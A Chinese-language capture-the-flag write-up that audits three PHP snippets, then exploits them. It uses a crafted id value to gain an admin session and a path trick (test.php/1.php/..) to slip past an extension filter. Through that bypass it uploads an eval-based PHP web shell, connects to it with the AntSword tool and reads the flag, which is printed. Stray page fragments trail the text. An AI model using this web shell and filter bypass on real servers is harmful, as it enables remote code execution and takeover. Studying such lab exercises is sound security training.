進入環境
進入項目管理
點擊進行訪問
是一堆代碼進行審計
<?php
session_start();if (!isset($_GET[page])) {show_source(__FILE__);die();
}if (isset($_GET[page]) && $_GET[page] != 'index.php') {include('flag.php');
}else {header('Location: ?page=flag.php');
}如果傳入的參數page的值不是index.php,則包含flag.php,否則重定向到?page=flag.php
<?php
if ($_SESSION['admin']) {$con = $_POST['con'];$file = $_POST['file'];$filename = "backup/".$file;if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){die("Bad file extension");}else{chdir('uploaded');$f = fopen($filename, 'w');fwrite($f, $con);fclose($f);}
}
?>POST提交con和file兩個參數
<?php
if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {include 'config.php';$id = mysql_real_escape_string($_GET[id]);$sql="select * from cetc007.user where id='$id'";$result = mysql_query($sql);$result = mysql_fetch_object($result);
} else {$result = False;die();
}if(!$result)die("<br >something wae wrong ! <br>");
if($result){echo "id: ".$result->id."</br>";echo "name:".$result->user."</br>";$_SESSION['admin'] = True;
}
?>參考up主@愚公搬代碼
需要獲取一個id參數, 并且id不為1,且最后一位等于9
floatval 函數用于獲取變量的浮點值
?page=flag.php&id=1xx9
上傳木馬
con=<?php @eval($_POST[cmd]);?>&file=test.php/1.php/..
訪問/uploaded/backup/目錄,發現上傳成功
連接蟻劍
注意:點開代理設置選擇不使用代理,電腦連接的網絡不要是校園網或者公司網絡,因為一般像這種企業級的wifi都會在頂部做一些防護手段來保證安全性。所以可以自己開熱點進行連接。
點擊測試連接,顯示成功,點擊添加,右鍵進入文件管理
cyberpeace{7720e85e876c98f3fb088ebd5dcaff1e}
)
)
 recorder-core)
![[AI]大模型MCP快速入門及智能體執行模式介紹](http://pic.xiahunao.cn/[AI]大模型MCP快速入門及智能體執行模式介紹)
)
)
